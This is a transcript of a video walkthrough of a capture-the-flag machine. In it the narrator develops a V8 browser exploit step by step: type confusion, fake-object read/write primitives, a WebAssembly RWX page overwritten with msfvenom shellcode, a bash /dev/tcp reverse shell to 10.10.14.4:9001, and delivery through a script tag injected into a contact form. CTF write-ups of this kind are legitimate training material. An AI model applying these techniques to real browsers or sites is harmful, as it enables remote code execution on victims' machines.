Again, we probably don't have to do this inside of these functions. We could just do it outside, but I find it's easier to follow this way. So we're going to put a memory address in it, then convert to object. So ARR0 is equal to I2F address. There we go. Then set last element obj map. So now we set it to an address, and because now it's an object map, we can write to where this address is essentially. So as an object, it follows memory address. So we can say the fake object is going to be ARR0. And then we set it back to be our map. Probably don't have to, but always good. So that's the fake object primitive. We have to create our fake array. So fake array is equal to FL map 1.1, 1.2, 1.3. And later on, we're going to trim this down to only have 1.1. We need this address because we're going to need to have data in here. So this will be like the length. So you can't just have this piece. And then var fake is going to be FakeObj address of fake array. And it's not going to work right off the bat with this because this fake array, we have to point it to right here. If we just don't do that, then fake array is going to be pointed like we're just copying the variable over top of itself. We want to point fake object to this spot in memory, which is where we're doing type confusion to create an object. So let's see. I'm going to set it to 1.1 for now. I think that would be potentially easier to understand. So let's go and run this. We need GDB, run with pwn.js. And we want to do a debug print on fake array and look at exactly where it exists in memory. So we're going to do x/, I guess, 32xw minus 1. So let's see. Let's do -1 minus 0x30. So we're looking for where the repeat is. And I wish I wrote what the float 1 was. I think, let's see. That's the length, because we have 4 objects in memory. So here's float 1, 1.1, and we have it repeat twice, right? And then this will be 1.2 and 1.3. And this is our starting point. So we want to go up to here, B8. So we're at D8 and we're going to go up to B8. So 20 hex we want to go up, or I think 32. 4, 8, 12, 16, 20, 24, 28, 32. So we're going to go up 32 places, which is 0x20. And at there, this is exactly where we are. So instead of this being 1.1, this is going to be where we put the metadata for a float array. So when we load this into memory, it thinks we put an object there when it's not really an object. We just put all the bytes that make it look like an object. So let's go back to pwn.js. And now we can say fake array, and it's going to be minus 0x20n. So now that we have the fake object, we can now read and write from memory. We just need to create those functions. So read address, and then we're going to deal with pointer tagging. So if address is even, then add 1. And I'm not sure exactly why this happens, but it's what Faith did. So if it's untagged or whatever it is, you just add 1 to make it that. It's the whole reason why we do the -1 thing in GDB. So now we can say our fake array, the second value, and we have to set this to be a float map. So we're setting this 1.1 value now. So I2F. We need to set the length to 1. I think we could probably set the length to be 1, 2, 3, 4, 8 as well. I believe. I'm not positive. I think that may work. If I have issues, I'll fix it. But the length of this array is technically 8. But we only care about this one address. So I don't know. I hate doing this because I know it's probably not going to work. And then I'm going to spend time debugging. ADDR minus 8n, because I'm going to forget what I did. Return fake 0. Okay. So this should let us read the address. We can try this out and really hope it works. So let's see. We want to create an array. So let's just do A is equal to please sub 1 or create an object. And then we want to read A. This is going to be read, what is it? I2F A. Oh, we need address of A. So we now just have a memory address. And what we read, even though we passed it a variable, like this may not seem like a big deal, but because we could have just done like A to read what's in A. But we gave it this, which is a hex string essentially. So if we do I2F this, and then F2H, we're able to just read this spot in memory. Of course, we have isolate root and stuff, but we're just able to read it. So that's what this allowed us to do. So if we read this and we do F2H, what is it? F2H this. We want to save this string. Then I want to do a debug print on A. And we're going to examine this in memory. So we do x/16xw minus 1. I'm typoing all over the place. There we go. So 51 and E9. So we got 51 there and E9 here. So a read put us right here. And when you combine that with the fake object, this is where we set the fake object. So now we have a variable that we just set at a place in memory that is a different object. And then we could now read values out of it. Hopefully that makes sense. Let's do write next. So pretty much copy the same thing, but we won't return something this time. So this will be write, and we do address value. And this again, if the pointer is untagged, we tag the pointer. And we do fake array 1, 32n, okay. But now we're going to set the very first object or variable of this fake array. So fake array 0 is equal to I2F bigint val. So now this should let us write something into memory. We can demonstrate this simply in GDB, as always. Just run the program again. And let's do a debug print on float array to get where it is in memory. And we're just going to write something to this spot. So if I do write, and then we do just 1, and I go to GDB, and let's take a look at this. So let's just look at it. We probably have to go up one thing. We have 1 right here. So what happens if we write a 2? Let's just verify we're writing. Instead of 2, let's do 3 to make sure we skipped it. So like 1, 2, skip a few thing. So continue, write, and we want to go here, and 3n, or 3. So if I go back in GDB and we look at this address again, it should be a 3. So now we have confirmed we can read memory addresses and locations and write to them. So we just have to find a read, write, execute page. Thankfully, Faith has a good article here. I can find where I'm at. We're not going to overwrite the free hook. We're going to use WebAssembly to create a read, write, execute page. And this code is just like return 42, I believe. If we look at WebAssembly Fiddler, we can turn it into a code buffer and then build. We see it begins with 097.115. And if we go back to Faith's page, 097.115 and 65.42.11, 65.42.11. So all this is doing is using WebAssembly to create a object. And for some reason, it decides to create it as read, write, execute. So since it's read, write, execute, we can use a fake object right to this spot and then put shellcode there and execute the shellcode. Normally this wouldn't work because a lot of the shellcode gets terminated because of sandboxing, but in this challenge, sandboxing is disabled. So essentially, that's what we do. The one thing we're going to have to do at this point is get the isolate root, which is, I believe, going to be the backing store address. So this syntax is almost identical. I think the only thing we have to change is this 20 to make it a bit smaller. So let's see. Where is this? Let's add this into a pwn.js. So v pwn.js, set paste. So now we will be able to create a read, write, execute page. And we need to do var read, write, execute page address is equal to, we read address of the WASM or WebAssembly instance. And we got to go up a bit. So let's just run this real quick. So run. Okay. And then DebugPrint WASM instance. And let's look at this in memory. So telescope this -1. And I think this highlights, let's see. No, it doesn't. I was wondering what these highlights were. But let's also do vmmap. And we want to look for the read, write, execute. So I'm just going to search for that. And we want to look at start. So we're going to look at this and then search again for that address. And we see at 68 spaces away from the WASM instance, that's where our read, write, execute page is. And this is going to be constant. So in our pwn script, this is address of WASM instance, and we just add 68. So plus 0x68n. Close that out, close that out. Okay. Console log. Found pointer to WASM instance 0x plus ADDR of WASM instance dot to string. Okay. I did that right? Yep. So let's see. We can do the read write page. So address of And this will be rwx page address. That may be a bit easier logically. So when we run this, this should be where our read, write, execute page is. Let's just verify this. WASM instance. I forgot to edit. RDX page address. So that's just going to be the value of this. And I don't have a good way to actually show the next piece off the top of my head. So we're just going to leave it at this. So this will be the pointer to this guy, which points to our read, write, execute page. So now we can do shellcode. And there's going to be one piece here that we have to change. I think I said it before. That 20 needs to be changed. So let's paste this code here. And then we're going to figure out exactly what that does. So first, it creates a new array buffer. Then it creates a data view. And it gets the address of where buffer is located using our AddrOf primitive. And then it uses the backing store. And I think this is just a place where like the variable is pointed to that's not affected by pointer compression, but I'm not 100% positive. But we need this, and in Faith's machine, it was at the buffer address plus 20. Now all these memory addresses have been changing because of pointer compression. So let's step through this and see if or is that offset 20 or it's at something different. Spoiler, it's somewhere different. So easiest way to do that is through the debug. And then we want to run our thing. We don't need the pwn.js because I honestly think we left pwn.js in a broken state because it started crashing on us and we switched to release. So now we want to grab this and then set it. Copy, paste, Control Shift, okay. Sometimes the clipboard is wonky. And then we want to set this. Then we want to just put some data in here. So data view dot set unsigned int 32. Let's put 4 A's. I don't know why I did 0x there. Copy. And then we can copy this piece. Okay, so let's debug print on buff to get the address and what the data store address is. So we're here. And we want to know where the backing store is. So let's go over to GDB and do x/16w, and we'll copy this address, -1 to untag the pointer, xw. There we go. And we want to look for, let's say, 31b0. So copy. So we want to get to here. And we are here. So this is 4, 8, 12, 16, 20. And 20 in decimal is, let's see, 10 is 16. So 14. So 0x14 to get there. So this is the place we want. So we change our code to be 14. That's in the wrong one. Pwn.js. So now we have the correct backing store address. So now that all is left is we just have to get some shellcode, copy it over, and run it. We'll use MSFVenom to create the shellcode. So I'm just going to put that as a blank space now, but we call copy shellcode and our RWX page address, and then the shellcode. And then F will execute it. So let's switch over to Parrot, and we can run MSFVenom-P Linux x64 exec cmd is equal to user bin touch temp pwned. Okay. And we want to do format dword. And I just want to make sure temp pwned doesn't already exist on my machine because, as I said, this is the second run through of this box. Because the first part of the video, I just didn't think it looked well. Wasn't nearly as polished and said a lot of wrong things probably. I probably said wrong things here too, but probably less so. So pw. So now we're just doing ls on temp pw to try to show us when it's created. And we can go back to this, copy this shellcode, and we will paste it in. Okay. So now that's one happy big variable. So let's run it. I'm in release. Shell pwn.js. And initial arb write is not defined. We use different functions than whatchamacallit, Faith did. We just called arb. We just called it write. We don't have A or B anywhere. It crashed and we don't have it. I wonder if it just doesn't work in GDB. Shell pwn.js. Sweet, we got the file. So now the next step is to get shellcode to reverse shell. So this will be touch temp pwned. It's always nice to save it. Actually, the best way to do it is this, if you're documenting. Okay, so the next thing we need is reverse shellcode. So let's just go up, cmd, bin bash-c, bash-i, dev tcp 10.10.14, I'm probably .4, I think. Is this still connected to the VPN? It is. 10.10.14.4. And I could copy this to my parent machine and do it. Doesn't really matter. 0 at and 1. And the double quote, single quote is ended. That should be good. While we wait, we can just copy this piece. I don't know what hotkey I hit. C2. Oh, we're on a different VM. Grab this shellcode. Come on. Highlight. Copy. Go over here. And we just have to make sure everything is on one line. There we go. So nc lvnp 1234. Is that what I did? That's bad shellcode. Shoot. We want 9001. Okay. Wait for this to copy and grab this. Copy. Let's go here and add 9001. Paste. And get rid of everything. There we go. And hope this works. Sweet, we got a shell. So now the next step to do is we'll test it on a browser. So if we go to 10.10.10.196, port 8000, we should be able to download Chrome. And I have it already downloaded and extracted, actually. So if I go into downloads, we go into Chrome, we can try executing it. And this piece, first time it's not going to work because we're going to do something that most browsers have enabled. So let's see, vindex.html, HTML head script source is equal to pwn.js / script / head / HTML. Thank you, color coding, for telling me I forgot that piece. So now let's copy, was it documents v8 x64 or alt.gn x64 release pwn.js. Make dir dub move index and pwn to dub Python 3-m HTTP server nc lvnp 9001. So if I go to localhost 8000, something went wrong loading this web page. We see we got it and it hit pwn.js, but something bad happened. We have a stack trace. And I'm showing this because sometimes when people run Chrome on Kali as root or something, they always do this --no-sandbox flag. And I'm showing you the sandbox is preventing this from getting code execution because it's blocking the call to exec. But if we'd pass it the no sandbox flag, and we go to this page again, we get a reverse shell. So now the last thing to do is see if this works on the target. So if we go to the contact us page, test, and we do script source equals HTTP 10.10.14.4 pwn.js, like that, I think. We send it. We did not say 8001 or 8000 for the web server port. Send. We got pwn.js, but we did not get a shell. Uh-oh. Let's see. Is that what it wants? There we go. So we have get pwn.js and a shell on Rope2 as the Chrome user. And you could go here and go into SSH or make dir SSH and drop an SSH key and begin doing the box. But that's going to be it for this video. Hopefully one day I'll do the user and the root. I wasn't too familiar with binary exploitation in general, and all these are pretty tough binary exploitation challenges. So I wanted to make sure I just did one super well instead of rushing through a heap challenge and then a kernel exploit challenge. So hopefully you guys enjoyed the V8 and this made sense. I promise you, if I did this whole video, the other V8 stuff I had was garbage. I spent a whole day figuring out how I want to do this video. So take care, guys. I hope you enjoyed it, and I will see you all next week.